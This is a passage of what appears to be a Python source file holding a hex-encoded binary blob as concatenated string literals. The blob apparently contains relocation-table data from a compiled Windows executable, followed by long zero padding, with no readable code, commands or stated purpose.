'0f00000800000007a319831ba31d03114329332a732eb322e33613397338a' \
'34aa34f93411351635813692362f3850385538a438eb384339fd39303a9a3' \
'add3a253b373b703bd23beb3bfc3b263c2d3c343c3b3c563c623c6c3c793c' \
'833c933ce63c203d3b3da73eb93ef33e003f0a3f183f213f2b3f4c3fc73fd' \
'73fed3f0000000001009801000000301a3022302d3044305e307930823088' \
'3091309630a530ac30d330fe3038316e3181311b324e327532c0321033283' \
'<KEY>' \
'<KEY>' \
'd36e736f936033725373037ac37c137a338e138ec38f23857398b399f39cf' \
'39403a5f3a763a853a2f3b393b3f3b533b5f3b833b893bab3bb33bbd3bc33' \
'bd33bdb3be13bf03bfa3b003c0f3c193c1f3c313c3e3c473c4f3c673c783c' \
'<KEY>' \
'03ce53ceb3cf33cf83cfe3c063d0b3d113d193d1e3d243d2c3d313d373d3f' \
'3d443d4a3d523d573d5d3d653d6a3d703d783d7d3d833d8b3d903d963d9e3' \
'da33da83db13db63dbc3dc43dc93dcf3dd73ddc3de23dea3def3df53dfd3d' \
'023e083e103e153e1b3e233e283e2e3e363e3b3e413e493e4e3e543e5c3e6' \
'13e673e6f3e743e7a3e823e873e8d3e953e9a3ea03ea83eae3ebc3eca3ed1' \
'3ede3ee73e813f913fa83fc63ff23f0000001001006400000095309c30c23' \
'0c93039314e317531d334c03534373a376037663785378b372639503b543b' \
'583b5c3b603b643b683b6c3b613c7e3cd13c6c3d743d8b3da93deb3d583e8' \
'b3ea03ea63ede3eea3e2a3f493f7c3f973fb53fd83fde3fe53f00200100e0' \
'00000035306e308030b530ce30063127312e315531623167317531aa31c73' \
'1cd31d731ed31003216321f322b3236325b328e329d32a432d232d732ef32' \
'f8320d331333383341334f336b3387338d33cd33d633e4330134093412341' \
'b343b347f3487349a34a534aa34bc34c734cc34e334ed3403352435aa35c1' \
'35ce35da35ea35f0350136203636364036463651367436793685368a36a93' \
'6ed361837353755376a377437d337063820383c38c0383339ab39dd39ec39' \
'0a3a643a273b503b593bac3bb53b8c3c983cc33c803d893d7b3e843e703fb' \
'a3fc33feb3f00300100480000003e3052309930dd30ee30023108310d3192' \
'329832c433e634fb3422358138c639413b473b6d3b733b953b9b3b423db63' \
'fba3fbe3fc23fc63fca3fce3fd23f00000040010060000000293130318f31' \
'b132c932f93258369d3718391e3944394a396c397239193bb93dbd3dc13dc' \
'53dc93dcd3dd13dd53d6d3e963ea93ebc3efb3e133f1d3f393f403f463f54' \
'3f5a3f6f3f803f8c3f933f9c3fb53fbf3fed3f00000050010084000000003' \
'04f30743086309f30d630af33c2331634253431344634523458345e346434' \
'ce34d4347536b936c3360c371837203731373c375a3776377e378337a737c' \
'a37d637e537ee37fb372a3832383d3842385d3862388138ca380e39143920' \
'3957396f39ef3afa3a003b273b6c3b723b773b7f3b173c243c353c553c233' \
'e0060010048000000613083328d329832ef328b341935ec36153921392c3a' \
'663a783a8a3a9c3aae3ac03ad23ae43af63a083b1a3b2c3b3e3b5d3b6f3b8' \
'13b933ba53b3b3fa03f000000700100980000001430f6306731a4311b322d' \
'32a832d132fa3208330e334a334c355d35583674365a3760376637d637db3' \
'7ed370b381f3825383039df39e539f139203a263a323a373a3c3a413a4a3a' \
'953a9a3ad93ade3ae73aec3af53afa3a073b643b6e3b8b3b953b043c3b3c5' \
'<KEY>' \
'3e523e0c3f163f2e3fd63f00800100bc0000000c305430633082309730b83' \
'<KEY>' \
'f732fd3205330b33113319331f3325332d3336333d3345334e33603378337' \
'e3387338d339733a233e533fd3316342c3691369d3615372f3738377237a1' \
'37b737d3374e388b389538b1380439153929392f3934392f3a363a9c3aa23' \
'ab83ae93a043b353bc03be33b163c693ca23cbd3ce83c033d2c3d553d833d' \
'b03df93d863eb13ecc3ee73e1e3fad3f00900100880000001030f3301e315' \
'1319d31c0311432ac32c732e2320533393382330234bc34fa348535d0351b' \
'36b136dc3642376f37b33702383f388938c538f03813393e3979398339883' \
'99239a339a839b439c039cc39d839dd39e739f439f939ff39033a083a0e3a' \
'1b3a273a313a3e3a513a553a5c3a603a673a6b3a723a7f3a8a3a8e3a943a0' \
'0a00100c4010000a432a832ac32b032b432b832bc32c032c432d032d432d8' \
'32dc32e032ec32f032f432f83248334c335033543358335c3360336433683' \
'36c337033843388338c33a033a433a833ac33b033b433b833bc33c033c433' \
'c833cc33d033d433d833dc33e033e433e833ec33f033f433f833fc3300340' \
'43408340c341034143418341c342034243428342c3430343c3444344c3454' \
'345c3464346c3474347c3484348c3494349c34a434ac34b434bc34c434cc3' \
'4d434dc34e434ec34f434fc3404350c3514351c3524352c3534353c354435' \
'<KEY>' \
'435cc35d435dc35e435ec35f435fc3504360c3614361c3624362c3634363c' \
'3644364c3654365c3664366c3674367c36843694369c36a436ac36b436bc3' \
'6c436cc36d436dc36e436ec36f436fc3604370c3714371c3724372c373437' \
'3c3744374c3754375c3764376c3774377c3784378c3794379c37a437ac37b' \
'437bc37c437cc37d437dc37e437ec37f437fc3704380c3814381c3824382c' \
'3834383c3844384c3854385c3864386c3874387c3884388c3894389c38a43' \
'8ac38b438bc38c438cc38d438dc38e438ec38f438fc38000000b001002000' \
'00009031943198319c3148354c35503588358c3590359435000000c001000' \
'4010000f435fc3504360c3614361c3624362c3634363c3644364c3654365c' \
'3664366c3674367c3684368c3694369c36a436c437c837cc37d037e837ec3' \
'7f037f437f837fc370038043808380c381038143818381c38203824382838' \
'2c383038343838383c384038443848384c385038543858385c38603864386' \
'8386c387038743878387c388038843888388c389038943898389c38a038a4' \
'38a838ac38b038b438b838bc38c038c438c838cc38d038d438d838dc38e03' \
'8e438e838ec38f038f438f838fc380039043908390c391039143918391c39' \
'2039243928392c393039343938393c394039443948394c395039543958395' \
'c396039643968396c39000000d00100400200002c3734373c3744374c3754' \
'375c3764376c3774377c3784378c3794379c37a437ac37b437bc37c437cc3' \
'7d437dc37e437ec37f437fc3704380c3814381c3824382c3834383c384438' \
'4c3854385c3864386c3874387c3884388c3894389c38a438ac38b438bc38c' \
'438cc38d438dc38e438ec38f438fc3804390c3914391c3924392c3934393c' \
'3944394c3954395c3964396c3974397c3984398c3994399c39a439ac39b43' \
'9bc39c439cc39d439dc39e439ec39f439fc39043a0c3a143a1c3a243a2c3a' \
'343a3c3a443a4c3a543a5c3a643a6c3a743a7c3a843a8c3a943a9c3aa43aa' \
'c3ab43abc3ac43acc3ad43adc3ae43aec3af43afc3a043b0c3b143b1c3b24' \
'3b2c3b343b3c3b443b4c3b543b5c3b643b6c3b743b7c3b843b8c3b943b9c3' \
'ba43bac3bb43bbc3bc43bcc3bd43bdc3be43bec3bf43bfc3b043c0c3c143c' \
'1c3c243c2c3c343c3c3c443c4c3c543c5c3c643c6c3c743c7c3c843c8c3c9' \
'43c9c3ca43cac3cb43cbc3cc43ccc3cd43cdc3ce43cec3cf43cfc3c043d0c' \
'3d143d1c3d243d2c3d343d3c3d443d4c3d543d5c3d643d6c3d743d7c3d843' \
'd8c3d943d9c3da43dac3db43dbc3dc43dcc3dd43ddc3de43dec3df43dfc3d' \
'043e0c3e143e1c3e243e2c3e343e3c3e443e483e503e583e603e683e703e7' \
'83e803e883e903e983ea03ea83eb03eb83ec03ec83ed03ed83ee03ee83ef0' \
'3ef83e003f083f103f183f203f283f303f383f403f483f503f583f603f683' \
'f703f783f803f883f903f983fa03fa83fb03fb83fc03fc83fd03fd83fe03f' \
'e83ff03ff83f000000e001006401000000300830103018302030283030303' \
'830403048305030583060306830703078308030883090309830a030a830b0' \
'30b830c030c830d030d830e030e830f030f83000310831103118312031283' \
'130313831403148315031583160316831703178318031883190319831a031' \
'a831b031b831c031c831d031d831e031e831f031f83100320832103218322' \
'0322832303238324032483250325832603268327032783280328832903298' \
'32a032a832b032b832c032c832d032d832e032e832f032f83200330833103' \
'3183320332833303338334033483350335833603368337033783380338833' \
'90339833a033a833b033b833c033c833d033d833e033e833f033f83300340' \
'8341034183420342834303438344034483450345834603468347034783480' \
'34883490349834a034a834b034b834c034c834d034d834e034e834f034f83' \
'40035083510351835203528353035383540354835503558356035000000f0' \
'01000c000000a438a838000002000c00000024312831002002004c010000e' \
'435e83544365c366c3670368436883698369c36a036a836c036d036d436e4' \
'36e836ec36f4360c371c3720373037343738373c3744375c376c377037803' \
'7843788378c379437ac37bc37c037d037d437dc37f4370438083818381c38' \
'2c38303834383c385438583860387838883898389c38a038b838bc38d038e' \
'038e438f438f83810392039243928392c39403944394839603964397c398c' \
'399039a039a439a839b039c839d839e839ec39f039f439083a0c3a103a143' \
'a243b2c3b343b383b403b543b5c3b703b783b8c3b943b9c3ba43ba83bac3b' \
'b43bc83bd03bd83be03be43be83bf03b043c203c403c603c6c3c883ca43ca' \
'83cc83ce83c083d243d283d443d483d683d883da83dc83de83df43d103e1c' \
'3e383e583e783e983eb83ed83ef83e143f183f343f383f583f603f643f803' \
'f883f8c3fa43fa83fc43fc83fd83ffc3f0000003002003802000008301030' \
'3c3040304830503058305c306430783094309830b830d830f830183138314' \
'0315c316c3178318031a031a831c431d431e031e8311c322c323832583268' \
'328c3294329c32a432ac32b432bc32c432cc32d432dc32e432ec32f432003' \
'32033283334333c3380339433a433b433c033e033e833f033fc331c342834' \
'48345034583460346834703478348434a434ac34b834d834e034ec340c351' \
'43520354035483554355c359035a035ac35b435d435f03500360c36143648' \
'3658366436843690369836cc36dc36e836083710371837203728373437543' \
'76037803788379037a037c437cc37d437dc37e437ec37f437fc3704380c38' \
'183838384038503874387c3884388c3894389c38a438ac38b438bc38c438d' \
'038f438fc3804390c3914391c3924392c3934393c3944394c3954395c3964' \
'396c39743980398839a839c439d439e039003a083a103a183a243a443a4c3' \
'a543a5c3a643a703a903aa03ac43acc3ad43adc3ae43aec3af43afc3a043b' \
'0c3b143b203b283b5c3b6c3b783b803bb43bc43bd03bf03bfc3b1c3c283c4' \
'c3c543c5c3c643c6c3c743c7c3c843c8c3c983cbc3cc43ccc3cd43cdc3ce4' \
'3cec3cf43cfc3c043d0c3d143d203d403d483d543d743d7c3d843d903db03' \
'db83dc03dc83dd03dd83de43d043e0c3e183e383e403e483e503e583e603e' \
'6c3e8c3e943e9c3ea43eac3eb43ebc3ec83ee83ef83e1c3f243f2c3f343f3' \
'c3f443f4c3f543f5c3f643f6c3f783f983fa03fa83fb03fb83fc03fc83fd4' \
'3ff43ffc3f000000400200440000000430103030303830443064306c30783' \
'09830a030ac30cc30d830f8300031083114311c31343144314c315c317031' \
'80318c31ac31b431c031e031000000600200740100000030043008301c303' \
'830543074309430b430d030d830703398389c38a038a438a838ac38b038b4' \
'38b838bc38c038c438c838cc38d038d438d838dc38e038e438e838ec38f03' \
'8f438f838fc380039043908390c391039143918391c392039243928392c39' \
'3039343938393c3940394c395039543958395c396039643968396c3970397' \
'43978397c398039843988398c399039943998399c39a039a439a839ac39b0' \
'39b439b839bc39c039c439c839cc39d039d439d839dc39e039e439e839ec3' \
'9f039f439f839fc39243a343a443a543a643a843a903a943a983a9c3ab83a' \
'bc3a403c483c4c3cd03df03df83dfc3d003e043e083e0c3e103e143e183e1' \
'c3e283e2c3e303e343e383e3c3e403e443e4c3e503e603e643e683e6c3e70' \
'3e743e783e7c3e803e843ea43ec43ee43e003f083f103f183f203f283f303' \
'f383f403f483f503f583f603f683f703f783f803f883f903f983fa03fa83f' \
'b03fb83fc03fc83fd03fd83fe03fe83ff03ff83f007002001800000000300' \
'830343060308430b030b430b8300000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
